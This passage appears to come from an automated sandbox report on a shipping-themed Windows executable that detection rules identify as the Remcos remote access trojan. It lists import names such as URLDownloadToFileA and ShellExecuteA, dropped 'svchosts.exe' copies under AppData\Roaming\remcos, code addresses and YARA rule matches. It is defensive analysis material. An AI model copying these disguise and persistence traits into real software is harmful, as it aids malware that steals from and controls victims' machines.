V10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02631738
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02631F90
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02631CD1
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02632201
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02630040
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02630007
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02636970
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_026319D0
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02630668
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02630621
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02631728
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_02631F82
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_04B5E758
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_04B5E74A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_04B5BD74
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C64EB3
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C60F10
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C61F18
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C67BD8
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C67398
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C68980
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6A6C8
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6A6B8
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6BFC0
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6BD92
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6B5B0
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C65A62
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6BB4A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6BB58
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C67313
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6E8D0
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C60040
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C66808
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6B95A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: 0_2_06C6B968
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_014DE74A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_014DE758
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_014DBD74
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD1738
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD1CD1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD3FDC
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD1F90
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD0668
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD0621
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD1728
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD40D7
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD0040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD0006
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD2201
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD1F85
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_04FD19D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CDE92
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C0D00
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C2DE0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C7398
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C7BD8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C8980
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C18F0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C0F00
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CBFC0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CA6B8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CA6C8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CBD90
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CB5B0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C7335
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C735F
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CBB58
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C734D
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CBB4A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CE3C0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CB95A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CE972
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CB968
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C6808
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C0033
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071C0040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CE870
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CE8D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 22_2_071CE8C1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_00EDF750
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_00EDE758
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_00EDE755
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_00EDBD74
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01111CD1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01113F04
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01111738
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01111F90
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_011119D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01110011
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01114007
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01110040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01112201
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01111728
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01116740
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01111F85
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01110621
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_01110668
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4DE92
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E40F10
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E41F18
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E42DE0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E47BD8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E47398
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E48980
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4A6C8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4A6B8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E40E92
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4BFC0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4B5B0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4BD92
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4E3C0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E47376
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4BB4A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4BB58
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E47335
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4E8C1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4E8D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4E870
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E40040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E46808
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4001D
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4B962
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4B968
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 23_2_06E4E972
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_00F4E758
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_00F4E74A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_00F4BD74
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02951738
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02951F90
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02951CD1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02952201
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02950019
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02950040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02950621
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02950668
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02951728
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_029519D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_0295696B
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_02951F80
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054CBDA0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C1F18
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C0F10
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054CA6C8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054CB968
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C8980
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C0040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C6808
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C0006
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054CE8D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054CBB58
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C7BD8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C7398
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe, Code function: 25_2_054C7393
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: String function: 0040FC1A appears 54 times
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Code function: String function: 0040FCBA appears 34 times
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.305795237.0000000006BB0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.297503108.00000000036D9000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameMajorRevision.exe< vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000000.205048582.0000000000404000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameDnUSdBB.exeD vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296596429.00000000026D1000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameWindowsNetwork.dll> vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.303268232.0000000003420000.00000002.00000001.sdmp, Binary or memory string: System.OriginalFileName vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000000.293608691.0000000001044000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameDnUSdBB.exeD vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.303534755.0000000003480000.00000002.00000001.sdmp, Binary or memory string: originalfilename vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.303534755.0000000003480000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Binary or memory string: OriginalFilenameDnUSdBB.exeD vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 22.2.svchosts.exe.2ff0a64.1.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
